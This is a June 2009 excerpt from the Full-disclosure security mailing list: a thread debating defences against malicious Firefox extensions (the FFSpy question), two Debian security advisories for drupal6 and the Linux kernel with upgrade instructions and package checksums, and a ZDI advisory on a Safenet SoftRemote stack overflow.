at 1:07 AM, Mario Alejandro Vilas Jerez <mvilas at gmail.com> wrote: >> >> Maybe this is a stupid question, but why not just requiring sudo to install addons? Then the addons could be stored along with the program files. That could require making the addons global rather than per-user, but I don't see that as a major problem - besides it can be avoided too by having a per-user list of addons to load. I believe a similar solution can be implemented for Windows. >> >>> >>> Consider a defense within the realm of possibility: >>> On install firefox requests that the user enter an identifier. This >>> identifier is presented to the user in the top bar of his browser >>> window. Firefox 'locks' all script files while it is on. >>> >>> >>> Firefox self-encrypts to the one-way-hash of the files. >>> A user will know they have been compromised because the identifier >>> cannot match if firefox.exe has been replaced by another version that >>> supersedes the checks if the identifier is stored as part of the >>> >>> >>> encrypted program stub. >>> >>> Firefox can lock the script files while it is open. It can update >>> scripts because it owns the locks and then can re-encrypt itself at >>> this time to match the new hash. >>> >>> Consider the possible attacks of such a defense: >>> >>> >>> This is susceptible to attacks on memory (injection to trigger an >>> update, overriding the update mechanism, trivial to read the >>> identifier to clone behavior). Is there an extension to this idea that >>> can protect against this? Perhaps this method in-situ with a memory >>> >>> >>> protection mechanism of some sort. >>> >>> Why: >>> Only a checking process that runs in an isolated read-only manner >>> would be sufficient to protect against such attacks. There are ways to >>> cat and mouse this problem but without a watchdog process that isn't >>> >>> >>> user-writable a tenable solution cannot be found. >>> >>> Can this be applied to other possible defenses? >>> A clever algorithm can always be beaten by another clever algorithm. >>> >>> What about other situations of this kind? >>> >>> >>> Consider also that it is just as likely, if not more so, that a virus >>> author would instead chose to write stubs to all binary files that >>> show up in either init scripts, cron, automatic services in windows >>> (hell you can patch svchost dlls), the start menu, explorer.exe, the >>> >>> >>> kernel, drivers, etc etc. >>> >>> ............................ >>> The real point here is a system that is difficult to compromise in the >>> first place, and that is encapsulated by many such systems that are >>> regularly rebuilt, is the only current defense. An attacker slowly >>> >>> >>> gains leverage over a system or system of systems, once gaining access >>> it is almost impossible to lock out and / or defend given an >>> adequately skilled adversary. >>> >>> The solution becomes clear, build innumerable artificial obstacles. >>> >>> >>> >>> All articles of advisories of this sort are masturbatory in nature. >>> >>> -Travis >> >> -- >> HONEY: I want to? put some powder on my nose. >> GEORGE: Martha, won?t you show her where we keep the euphemism? > > > > -- > HONEY: I want to? put some powder on my nose. > GEORGE: Martha, won?t you show her where we keep the euphemism? -- HONEY: I want to? put some powder on my nose. GEORGE: Martha, won?t you show her where we keep the euphemism? From tbiehn at gmail.com Tue Jun 2 06:16:36 2009 From: tbiehn at gmail.com (T Biehn) Date: Tue, 2 Jun 2009 01:16:36 -0400 Subject: [Full-disclosure] Is FFSpy a hoax? In-Reply-To: <96136.1243914409@turing-police.cc.vt.edu> References: <d8578b4e0905300001q36cc448rd912c8edf621deeb@mail.gmail.com> <46917.1243870642@turing-police.cc.vt.edu> <2d6724810906012005r2542dda6kf548bc2fd4eaf063@mail.gmail.com> <96136.1243914409@turing-police.cc.vt.edu> Message-ID: <2d6724810906012216l7a93a747rb282c88f2638ab66@mail.gmail.com> On Mon, Jun 1, 2009 at 11:46 PM, <Valdis.Kletnieks at vt.edu> wrote: > On Mon, 01 Jun 2009 23:05:02 EDT, T Biehn said: >> Consider a defense within the realm of possibility: >> On install firefox requests that the user enter an identifier. This >> identifier is presented to the user in the top bar of his browser >> window. Firefox 'locks' all script files while it is on. >> Firefox self-encrypts to the one-way-hash of the files. >> A user will know they have been compromised because the identifier >> cannot match if firefox.exe has been replaced by another version that >> supersedes the checks if the identifier is stored as part of the >> encrypted program stub. > > Several problems here: > > 1) Self-encrypting to the one-way-hash doesn't solve the problem - an > attacker can decrypt the stored file, extract the identifier, and then > save the backdoored file encrypted to the new hash, identifier and all. > (Hint - this is exactly what you'd have to do on a *legitimate* update > of an extension...) > > 2) And in fact, encrypting to the expected hash value doesn't actually do > much for you - if I know the expected hash value is 0x349F3D, I can just > use that to store an encrypted backdoored file whose hash in fact *isn't* > 0x349F3D. ?Now, *once retrieved*, you probably should re-check the hash > of the retrieved file, and make sure it is still 0x349F3D - but at that > point, the crypting is pointless, as all you care about is the before/after > hashes of the plaintext. Now finding a secure way to store that "before" > hash - *that's* the hard part (in general, you can't store it anyplace the > user can write to, which makes a legitimate update "interesting") > > 3) The usual warnings about using a good crypto-strength hash function apply. > I haven't seen a break for MD5 that allows colliding to a pre-determined hash > yet. ?The key word here is "yet". ;) > > 4) You'd probably have to decide between having one master identifier which > would piss off users and break every time Firefox or any extension released a > patch, or having one identifier per extension, and piss off users who can't > remember all the identifiers... > > 5) A small UI real estate problem - at least on my Linux box, Firefox is > already using the window titlebar to display the <title> tag from the page. > I suspect that users still want that behavior, so you need to find a way > to co-exist with that. But heck, if Firefox Minefield builds can stick > a build ID onto the titlebar, what's another 10-15 chars? ;) > > > VK: Did you read the first sentence of my e-mail and then ignore the rest? Pretty obvious from the above. -Travis From white at debian.org Mon Jun 1 15:40:59 2009 From: white at debian.org (Steffen Joeris) Date: Tue, 2 Jun 2009 00:40:59 +1000 (EST) Subject: [Full-disclosure] [SECURITY] [DSA 1808-1] New drupal6 packages fix insufficient input sanitising Message-ID: <20090601144059.08BB4E4026@hannah.localdomain> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1808-1 security at debian.org http://www.debian.org/security/ Steffen Joeris June 01, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : drupal6 Vulnerability : insufficient input sanitising Problem type : remote Debian-specific: no CVE ID : no CVE id yet Debian Bug : 529190 531386 Markus Petrux discovered a cross-site scripting vulnerability in the taxonomy module of drupal6, a fully-featured content management framework. It is also possible that certain browsers using the UTF-7 encoding are vulnerable to a different cross-site scripting vulnerability. For the stable distribution (lenny), these problems have been fixed in version 6.6-3lenny2. The oldstable distribution (etch) does not contain drupal6. For the testing distribution (squeeze) and the unstable distribution (sid), these problems have been fixed in version 6.11-1.1. We recommend that you upgrade your drupal6 packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6-3lenny2.diff.gz Size/MD5 checksum: 21561 55998c89be8cde527e192e57b7c439d5 http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6-3lenny2.dsc Size/MD5 checksum: 1132 7d8a825a0e670972ab6dd4ee98c341c4 http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6.orig.tar.gz Size/MD5 checksum: 1071507 caaa55d1990b34dee48f5047ce98e2bb Architecture independent packages: http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6-3lenny2_all.deb Size/MD5 checksum: 1088692 fc0fd6e5d35869f6b8bc692fe7183248 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkoj58gACgkQ62zWxYk/rQfG7ACcCaIP6IqB4ZybMtiz37gWHZ1t 038An3zTZ4RP8FIBwAuBI5CrSzcCQLTL =TsNN -----END PGP SIGNATURE----- From zdi-disclosures at tippingpoint.com Mon Jun 1 17:42:42 2009 From: zdi-disclosures at tippingpoint.com (ZDI Disclosures) Date: Mon, 1 Jun 2009 11:42:42 -0500 Subject: [Full-disclosure] ZDI-09-024: Safenet SoftRemote IKE Service Remote Stack Overflow Vulnerability Message-ID: <C6496F32.17B6F%zdi-disclosures@tippingpoint.com> ZDI-09-024: Safenet SoftRemote IKE Service Remote Stack Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-024 June 1, 2009 -- Affected Vendors: Safenet -- Affected Products: Safenet SoftRemote -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6801. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Safenet Softremote IKE VPN service. Authentication is not required to exploit this vulnerability. The specific flaw exists in the ireIke.exe service listening on UDP port 62514. The process does not adequately handle long requests resulting in a stack overflow. Exploitation can result in complete system compromise under the SYSTEM credentials. -- Vendor Response: Safenet states: The issue has been fixed in our release version 10.8.6, customers are advised to upgrade to this version. -- Disclosure Timeline: 2008-10-28 - Vulnerability reported to vendor 2009-06-01 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Ruben Santamarta -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ From dannf at debian.org Tue Jun 2 05:57:13 2009 From: dannf at debian.org (dann frazier) Date: Mon, 1 Jun 2009 22:57:13 -0600 Subject: [Full-disclosure] [SECURITY] [DSA 1809-1] New Linux 2.6.26 packages fix several vulnerabilities Message-ID: <20090602045712.GB741@ldl.fc.hp.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ---------------------------------------------------------------------- Debian Security Advisory DSA-1809-1 security at debian.org http://www.debian.org/security/ dann frazier Jun 01, 2009 http://www.debian.org/security/faq - ---------------------------------------------------------------------- Package : linux-2.6 Vulnerability : denial of service, privilege escalation Problem type : local/remote Debian-specific: no CVE Id(s) : CVE-2009-1630 CVE-2009-1633 CVE-2009-1758 Several vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service, or privilege escalation. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2009-1630 Frank Filz discovered that local users may be able to execute files without execute permission when accessed via an nfs4 mount. CVE-2009-1633 Jeff Layton and Suresh Jayaraman fixed several buffer overflows in the CIFS filesystem which allow remote servers to cause memory corruption. CVE-2009-1758 Jan Beulich discovered an issue in Xen where local guest users may cause a denial of service (oops). This update also fixes a regression introduced by the fix for CVE-2009-1184 in 2.6.26-15lenny3. This prevents a boot time panic on systems with SELinux enabled. For the stable distribution (lenny), these problems have been fixed in version 2.6.26-15lenny3. For the oldstable distribution (etch), these problems, where applicable, will be fixed in future updates to linux-2.6 and linux-2.6.24. We recommend that you upgrade your linux-2.6 and user-mode-linux packages. Note: Debian carefully tracks all known security issues across every linux kernel package in all releases under active security support. However, given the high frequency at which low-severity security issues are discovered in the kernel and the resource requirements of doing an update, updates for lower priority issues will normally not be released for all kernels at the same time. Rather, they will be released in a staggered or "leap-frog" fashion. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages The following matrix lists additional source packages that were rebuilt for compatibility with or to take advantage of this update: Debian 5.0 (lenny) user-mode-linux 2.6.26-1um-2+15lenny3 You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - -------------------------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.26-1um-2+15lenny3.diff.gz Size/MD5 checksum: 13441 46517a06496e67f876a403f660e4b4eb http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26.orig.tar.gz Size/MD5 checksum: 61818969 85e039c2588d5bf3cb781d1c9218bbcb http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.26-1um-2+15lenny3.dsc Size/MD5 checksum: 1272 70aae2d1f8ec5b7308408ce834de634c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-15lenny3.dsc Size/MD5 checksum: 5777 8cd859a06cd6331d2d9ccdc952b0c597 http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.26-1um.orig.tar.gz Size/MD5 checksum: 12566 58cd8b7f3a51b2272c9afc10b81551cc http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-15lenny3.diff.gz Size/MD5 checksum: 7345643 ff734f4ccc5f35f2523ba2b016505094 Architecture independent packages: http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-15lenny3_all.deb Size/MD5 checksum: 4624804 b1ed811e84897fed9bd787941049fcac http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-15lenny3_all.deb Size/MD5 checksum: 104234 9de9e145bfc32ec0991a3f351b51a420 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-15lenny3_all.deb Size/MD5 checksum: 119590 e16bd6d918d369c0c03c14125d696671 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-15lenny3_all.deb Size/MD5 checksum: 2270224 5cf29ebfb992106e057386b0317c041e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-15lenny3_all.deb Size/MD5 checksum: 48704082 ad86ccd2802ad28120de00d0e0aa12fa http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-15lenny3_all.deb Size/MD5 checksum: 1757644 60da55b0a7f05a1277d582dd20f9f519 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny3_alpha.deb Size/MD5 checksum: 103778 4e9d0df5dc1623eb479feadea60115f9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-15lenny3_alpha.deb Size/MD5 checksum: 28462556 6e5a8121427fc299e9be3ee659da20e9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-15lenny3_alpha.deb Size/MD5 checksum: 103798 4c2985aba1796b3fd1fbad6a4715f287 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-15lenny3_alpha.deb Size/MD5 checksum: 368002 abf0e23d05562185b071c7ba8212d7d2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-15lenny3_alpha.deb Size/MD5 checksum: 369438 21d85ff94ae08c17318dde37433754fc http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-15lenny3_alpha.deb Size/MD5 checksum: 29151852 a1cbbcdd672325dc80c23e07b7910a00 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny3_alpha.deb Size/MD5 checksum: 751098 3d5934d1eae54c40e6b27cd116205b7d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-15lenny3_alpha.deb Size/MD5 checksum: 368480 17889fe8a22839b1e4ca4f1626e9fbca http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-15lenny3_alpha.deb Size/MD5 checksum: 28444990 0ec36bba974fbd0fbf9f25f2a404e395 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny3_alpha.deb Size/MD5 checksum: 3608194 c31a9bd80b75f3e428d511e6b617b469 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny3_amd64.deb Size/MD5 checksum: 761936 9b90dce36113f7c8fa8482b135808389 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-15lenny3_amd64.deb Size/MD5 checksum: 397896 89d2d9935e758e06de9ba7b7fe618ac9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-15lenny3_amd64.deb Size/MD5 checksum: 21075000 6af4df737dbc325bd1432d7cd4456b81 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-15lenny3_amd64.deb Size/MD5 checksum: 3830804 30ad735ef4c039aa8f880e204529f7f9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-15lenny3_amd64.deb Size/MD5 checksum: 392982 334179490462af4b97772dc69f56fc25 http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-15lenny3_amd64.deb Size/MD5 checksum: 103756 500cc170b02d975260e2ac53bec854e7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-15lenny3_amd64.deb Size/MD5 checksum: 392234 617103656537d329bfc953fcba65bbcc http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-15lenny3_amd64.deb Size/MD5 checksum: 1800414 698287e65aec7a169b3ced438637d8b0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-15lenny3_amd64.deb Size/MD5 checksum: 103804 2edf4279937506295f4c5a901b5220db http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-15lenny3_amd64.deb Size/MD5 checksum: 20918568 ef1072104b6ed3a1cc119146b2e8da65 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-15lenny3_amd64.deb Size/MD5 checksum: 3935510 cce9f516c91bb2124b4661aeeab3920f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-15lenny3_amd64.deb Size/MD5 checksum: 19288410 c3f35d4f44df3d1ec3f5e2784948731c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-15lenny3_amd64.deb Size/MD5 checksum: 3852442 c1208518b4067fe8fcb482f8fd801d66 http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.26-1um-2+15lenny3_amd64.deb Size/MD5 checksum: 5790374 f85dea5afa64f47a3ea997ef7e33e6be http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-15lenny3_amd64.deb Size/MD5 checksum: 388076 19353dfc63917595940adf40197c16a8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny3_amd64.deb Size/MD5 checksum: 103778 79c3650bd21207a58a7b0e226a4f9c27 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny3_amd64.deb Size/MD5 checksum: 3794690 916322e25f1d44a8b8bc516fbae9e786 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-15lenny3_amd64.deb Size/MD5 checksum: 20896990 590df647b2825c4d7afb0a8b2819b3e2 arm architecture (ARM) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-15lenny3_arm.deb Size/MD5 checksum: 11407632 8a074fda79cc1167a72315b39148cea3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-15lenny3_arm.deb Size/MD5 checksum: 10230040 73621317e5ff12cc0d7a14d292e4116b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-15lenny3_arm.deb Size/MD5 checksum: 360120 b2d6422ea1ab40eb9d275795d1c0ac3f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny3_arm.deb Size/MD5 checksum: 4135714 f28864861256126e1b9f81b3e360aca6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-15lenny3_arm.deb Size/MD5 checksum: 12429886 9579670e997f5b973832cc50316ca295 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-15lenny3_arm.deb Size/MD5 checksum: 103724 f0bd8cce1f99c0730715a845e262ade6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny3_arm.deb Size/MD5 checksum: 743458 26647559aace3dd029d883a5ba8064a9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny3_arm.deb Size/MD5 checksum: 103688 ecd1998d8e1166b01d6ff575aff8579b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-15lenny3_arm.deb Size/MD5 checksum: 345980 a0c34e4e2606a1c8783dd081d37f1f12 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-15lenny3_arm.deb Size/MD5 checksum: 11714390 d8c325ab70596f102b22ac15e27c5904 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-15lenny3_arm.deb Size/MD5 checksum: 362380 921cf01c8eb0ccbf3200f3c1a0baf682 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-15lenny3_arm.deb Size/MD5 checksum: 357016 3b624e914d0c8536b1820d51f86ab425 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-15lenny3_armel.deb Size/MD5 checksum: 359020 622de935d2c91167d4a79e01304316a4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-15lenny3_armel.deb Size/MD5 checksum: 11371366 3b8d94f6eedf046f5304ce33185489a1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-15lenny3_armel.deb Size/MD5 checksum: 364776 f0f45833a17a69263f24807c068c10e4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny3_armel.deb Size/MD5 checksum: 744280 cfda49deed4ed4b1450e3535441e4934 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-15lenny3_armel.deb Size/MD5 checksum: 12394882 154ae416e304cafbfffaa8eba665e4ed http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny3_armel.deb Size/MD5 checksum: 103782 6c76e86e8bbf1e27de54c8bb83edfeb4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-15lenny3_armel.deb Size/MD5 checksum: 11682264 bbab64ade54340f0556631479d02f57b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-15lenny3_armel.deb Size/MD5 checksum: 362178 d921cbcaefe5f95ca518ecfdabea2ba7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-15lenny3_armel.deb Size/MD5 checksum: 103810 1292c1525b3169365585f2cba6244df1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-15lenny3_armel.deb Size/MD5 checksum: 9571138 7833deff72232307e2bc1aa93bc1509b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny3_armel.deb Size/MD5 checksum: 4127664 adb5ca76f5070f78b41bc6e86a9a4417 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-15lenny3_armel.deb Size/MD5 checksum: 333396 8ad071eeed271556a1cae4a40111474a hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-15lenny3_hppa.deb Size/MD5 checksum: 294596 dc514ba17cef1fb1b8cfeb0fabb8381f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-15lenny3_hppa.deb Size/MD5 checksum: 15610566 ade83aaf0784637972ae93d7ea5f3f78 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-15lenny3_hppa.deb Size/MD5 checksum: 16937062 08bd4186be38db56adb4afc3bd5b935f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-15lenny3_hppa.deb Size/MD5 checksum: 296146 805a367fd7dc52e2932e27f89d4b5006 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-15lenny3_hppa.deb Size/MD5 checksum: 295764 f272d911d129eeb20f595d88e492a4a1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny3_hppa.deb Size/MD5 checksum: 103778 7cb8618a788999c515fa561c99973281 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny3_hppa.deb Size/MD5 checksum: 3590786 7e6dac7fc2a8bfc24e02a1e6d86fabe7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-15lenny3_hppa.deb Size/MD5 checksum: 16206790 dd826bae07d4aeb02e1f4155b5487df8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny3_hppa.deb Size/MD5 checksum: 756530 7ea078eb1c453c262143c5e2eed0a964 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-15lenny3_hppa.deb Size/MD5 checksum: 103806 6c0d59f1c52fe18f10048a23d4d5f1da http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-15lenny3_hppa.deb Size/MD5 checksum: 17481344 cdad37a9d8ed08453999ba2f247b69f0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-15lenny3_hppa.deb Size/MD5 checksum: 295106 f6ceae04fb9135cf55c1c36434bf998f i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 103818 7900abce9d809db3477c0cf157fe40c5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 20260540 4b31b22bcbc186ece6df76efc3b395c4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 396982 c803df45ba6b63c56348141c71f87868 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 746696 a7f6e45793b33ae4e05b831785fd9f42 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 20117860 dcdbf101905f5109d40537ba4dad4bdd http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 3715288 69705f4a668eca1a32eeb3e1e910a777 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 20236214 a12af6ab28a377d5114f960833129fe6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 381548 a6f282ec084dd591fd74e278b40a9281 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 395766 488aad91fdd10acbc9457166c56f9bd7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 17945818 9c01ca72a7557f9c4f5fc2f19c00bd9c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 103768 cec6b5baa5d7386f68a94a6331ccacff http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 396212 50743c4f96ca631a0481fa5c7c10ddb8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 3748068 513dc3fa26b122ee317db22fd76c45e1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 20766796 859e450d757e3bf64982e23b10719162 